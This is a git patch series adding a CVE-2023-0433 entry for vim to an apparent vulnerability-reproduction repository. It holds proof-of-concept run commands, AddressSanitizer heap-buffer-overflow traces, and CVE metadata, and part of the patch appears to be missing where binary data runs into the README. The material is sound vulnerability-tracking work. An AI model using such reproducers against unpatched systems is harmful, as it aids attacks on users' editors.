From fabddad72dac0268d495191d95fc12467ea62ef2 Mon Sep 17 00:00:00 2001 From: tajiaodavid Date: Fri, 10 Mar 2023 12:09:57 +0800 Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0433?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 0 -> 6148 bytes cve/vim/2023/.DS_Store | Bin 0 -> 6148 bytes cve/vim/2023/CVE-2023-0433/POC1 | 3 + cve/vim/2023/CVE-2023-0433/POC2 | 7 ++ cve/vim/2023/CVE-2023-0433/README.md | 147 +++++++++++++++++++++++++++ cve/vim/2023/yaml/CVE-2023-0433.yaml | 21 ++++ openkylin_list.yaml | 1 + 7 files changed, 179 insertions(+) create mode 100644 .DS_Store create mode 100644 cve/vim/2023/.DS_Store create mode 100644 cve/vim/2023/CVE-2023-0433/POC1 create mode 100644 cve/vim/2023/CVE-2023-0433/POC2 create mode 100644 cve/vim/2023/CVE-2023-0433/README.md create mode 100644 cve/vim/2023/yaml/CVE-2023-0433.yaml diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..040f60c29dd2427422e62a087fae9e8c01d99725 GIT binary patch literal 6148 zcmeHKyN<#@474Ey5)CEg{sMonLfjYd1E(YCnuth;jym1_Hsc2j8TQZJbi=W>vX9NY7_-cy(T z&#CKA-yqqkjkMB(e7;d%x`HGsKn17(6`%rCV5ESxRM=t}$VdgK02R0^VBd!VH>`<6 zpnp0Ld;|bCNV{R}vjnhM0$3A=KxAMVrNAiF95FP?kuS-si9=wNi{|j5d9&t(qJBHh zFHRS&fs9mu3Op*1L;A}4{|EfZ{Qp?QCn`V%-bw*&cKh8Huav!Y@^aQ|3;Yv)GjN@b l;H?R`JxxG?Tj<-77}nSEevM2H(VW)^nm zZg1y=rqF6dMEm3RO{5i(8Qf65ElkbM%_sJd83n>|$3kA=oxA|AGvhwXQa)t>>zx0N zd%Epmvs>@?yX!7v6&0WYRDcRl0V?pX0@izBv!_5tDnJFOz)1o7J`}iNO&kOL(}Cb4 z0I)&Y4QrnzfW;EPnm7g`1Jj@agQ_`VXwZ=_SyvOsz@Urf@S*u+%?U;Q>A1gmxo8b! zqykjnQh~?Vw$}d#_#gBCC5byKKn3nf0c};?()@uv=3vM+(a5Jo(g5d2K j= master, tag: v9.0.1221, origin/master, origin/HEAD) + +Able to replicate the same bug in version 9.0.1224: +./vim -version +VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 21 2023 19:27:29) +git log +commit 47bba53bdb6d59057887149e2eeb2071803e547e (HEAD -> master, tag: v9.0.1224, origin/master, origin/HEAD) + +# Proof of Concept (same_leader) +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./POC1 -c :qa! +================================================================= +==2551383==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001510d at pc 0x5579aa32a5f2 bp 0x7ffd2182a1e0 sp 0x7ffd2182a1d0 +READ of size 1 at 0x62100001510d thread T0 + #0 0x5579aa32a5f1 in same_leader /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:558 + #1 0x5579aa333a53 in format_lines /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:1091 + #2 0x5579aa337d77 in op_format /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:852 + #3 0x5579a9de190a in do_pending_operator /home/limweicheng/Desktop/Fuzz/vim/src/ops.c:4192 + #4 0x5579a9d8e9ff in normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:960 + #5 0x5579a99cef22 in exec_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8887 + #6 0x5579a99cf8e1 in exec_normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8850 + #7 0x5579a99cf8e1 in ex_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8768 + #8 0x5579a99e89fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580 + #9 0x5579a99e89fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993 + #10 0x5579aa0bcc05 in do_source_ext /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1672 + #11 0x5579aa0c34c0 in do_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1818 + #12 0x5579aa0c34c0 in cmd_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1163 + #13 0x5579a99e89fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580 + #14 0x5579a99e89fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993 + #15 0x5579aa716321 in exe_commands /home/limweicheng/Desktop/Fuzz/vim/src/main.c:3146 + #16 0x5579aa716321 in vim_main2 /home/limweicheng/Desktop/Fuzz/vim/src/main.c:782 + #17 0x5579a961f8b7 in main /home/limweicheng/Desktop/Fuzz/vim/src/main.c:433 + #18 0x7ff853b96d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 + #19 0x7ff853b96e3f in __libc_start_main_impl ../csu/libc-start.c:392 + #20 0x5579a9626574 in _start (/home/limweicheng/Desktop/Fuzz/vim/src/vim+0x199574) + +0x62100001510d is located 13 bytes to the right of 4096-byte region [0x621000014100,0x621000015100) +allocated by thread T0 here: + #0 0x7ff854630867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 + #1 0x5579a9626aca in lalloc /home/limweicheng/Desktop/Fuzz/vim/src/alloc.c:246 + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:558 in same_leader +Shadow bytes around the buggy address: + 0x0c427fffa9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffa9e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffa9f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffaa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffaa10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fffaa20: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffaa30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffaa40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffaa50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffaa60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffaa70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==2551383==ABORTING + +# Proof of Concept (utfc_ptr2len) +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./POC2 -c :qa! +================================================================= +==2554992==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006ed2 at pc 0x5649350fbbce bp 0x7ffc71a4da10 sp 0x7ffc71a4da00 +READ of size 1 at 0x602000006ed2 thread T0 + #0 0x5649350fbbcd in utfc_ptr2len /home/limweicheng/Desktop/Fuzz/vim/src/mbyte.c:2138 + #1 0x564935236185 in get_visual_text /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:3678 + #2 0x56493523c47b in nv_zg_zw /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:2613 + #3 0x56493523c47b in nv_zet /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:2990 + #4 0x56493522b305 in normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:938 + #5 0x564934e6cf22 in exec_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8887 + #6 0x564934e6d8e1 in exec_normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8850 + #7 0x564934e6d8e1 in ex_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8768 + #8 0x564934e869fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580 + #9 0x564934e869fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993 + #10 0x56493555ac05 in do_source_ext /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1672 + #11 0x5649355614c0 in do_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1818 + #12 0x5649355614c0 in cmd_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1163 + #13 0x564934e869fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580 + #14 0x564934e869fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993 + #15 0x564935bb4321 in exe_commands /home/limweicheng/Desktop/Fuzz/vim/src/main.c:3146 + #16 0x564935bb4321 in vim_main2 /home/limweicheng/Desktop/Fuzz/vim/src/main.c:782 + #17 0x564934abd8b7 in main /home/limweicheng/Desktop/Fuzz/vim/src/main.c:433 + #18 0x7f4dacd1ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 + #19 0x7f4dacd1ee3f in __libc_start_main_impl ../csu/libc-start.c:392 + #20 0x564934ac4574 in _start (/home/limweicheng/Desktop/Fuzz/vim/src/vim+0x199574) +0x602000006ed2 is located 0 bytes to the right of 2-byte region [0x602000006ed0,0x602000006ed2) +allocated by thread T0 here: + #0 0x7f4dad7b8867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 + #1 0x564934ac4aca in lalloc /home/limweicheng/Desktop/Fuzz/vim/src/alloc.c:246 + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/limweicheng/Desktop/Fuzz/vim/src/mbyte.c:2138 in utfc_ptr2len +Shadow bytes around the buggy address: + 0x0c047fff8d80: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd + 0x0c047fff8d90: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd + 0x0c047fff8da0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd + 0x0c047fff8db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd + 0x0c047fff8dc0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 01 fa +=>0x0c047fff8dd0: fa fa 00 00 fa fa 01 fa fa fa[02]fa fa fa fd fa + 0x0c047fff8de0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa + 0x0c047fff8df0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa + 0x0c047fff8e00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa + 0x0c047fff8e10: fa fa fd fd fa fa fd fa fa fa fd fa fa fa 07 fa + 0x0c047fff8e20: fa fa 01 fa fa fa 01 fa fa fa 05 fa fa fa 01 fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==2554992==ABORTING + diff --git a/cve/vim/2023/yaml/CVE-2023-0433.yaml b/cve/vim/2023/yaml/CVE-2023-0433.yaml new file mode 100644 index 00000000..4f5d39a3 --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-0433.yaml @@ -0,0 +1,21 @@ +id: CVE-2023-0433 +source: https://huntr.dev/bounties/ae933869-a1ec-402a-bbea-d51764c6618e/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + GitHub 仓库 vim/vim 在 9.0.1225 之前存在基于堆栈的缓冲区溢出。 + scope-of-influence: + vim < 9.0.1225 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0433 + - https://github.com/vim/vim/pull/11923 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0433 + cwe-id: CWE-122 + cnvd-id: None + kve-id: None + tags: cve2023, 缓冲区溢出 + \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7..108cacdb 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -42,6 +42,7 @@ cve: - CVE-2022-2257 - CVE-2022-2264 - CVE-2022-2598 + - CVE-2023-0433 openssl: - CVE-2022-1292 - CVE-2022-2274 -- Gitee From d06cc59e725204b3dbd524bbd069a7a6aca1aa5d Mon Sep 17 00:00:00 2001 From: tajiaodavid Date: Fri, 10 Mar 2023 09:07:50 +0000 Subject: [PATCH 2/3] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20.DS?= =?UTF-8?q?=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 6148 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 040f60c29dd2427422e62a087fae9e8c01d99725..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKyN<#@474Ey5)CEg{sMonLfjYd1E(YCnuth;jym1_Hsc2j8TQZJbi=W>vX9NY7_-cy(T z&#CKA-yqqkjkMB(e7;d%x`HGsKn17(6`%rCV5ESxRM=t}$VdgK02R0^VBd!VH>`<6 zpnp0Ld;|bCNV{R}vjnhM0$3A=KxAMVrNAiF95FP?kuS-si9=wNi{|j5d9&t(qJBHh zFHRS&fs9mu3Op*1L;A}4{|EfZ{Qp?QCn`V%-bw*&cKh8Huav!Y@^aQ|3;Yv)GjN@b l;H? Date: Fri, 10 Mar 2023 09:07:59 +0000 Subject: [PATCH 3/3] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?vim/2023/.DS=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/.DS_Store | Bin 6148 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/vim/2023/.DS_Store diff --git a/cve/vim/2023/.DS_Store b/cve/vim/2023/.DS_Store deleted file mode 100644 index 396efc5384f466fdfe665ad405f4529d0012df10..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKyK2Kg5Zp~v7(zg$%lm;qV&wx4+4_P&>R`JxxG?Tj<-77}nSEevM2H(VW)^nm zZg1y=rqF6dMEm3RO{5i(8Qf65ElkbM%_sJd83n>|$3kA=oxA|AGvhwXQa)t>>zx0N zd%Epmvs>@?yX!7v6&0WYRDcRl0V?pX0@izBv!_5tDnJFOz)1o7J`}iNO&kOL(}Cb4 z0I)&Y4QrnzfW;EPnm7g`1Jj@agQ_`VXwZ=_SyvOsz@Urf@S*u+%?U;Q>A1gmxo8b! zqykjnQh~?Vw$}d#_#gBCC5byKKn3nf0c};?()@uv=3vM+(a5Jo(g5d2K j=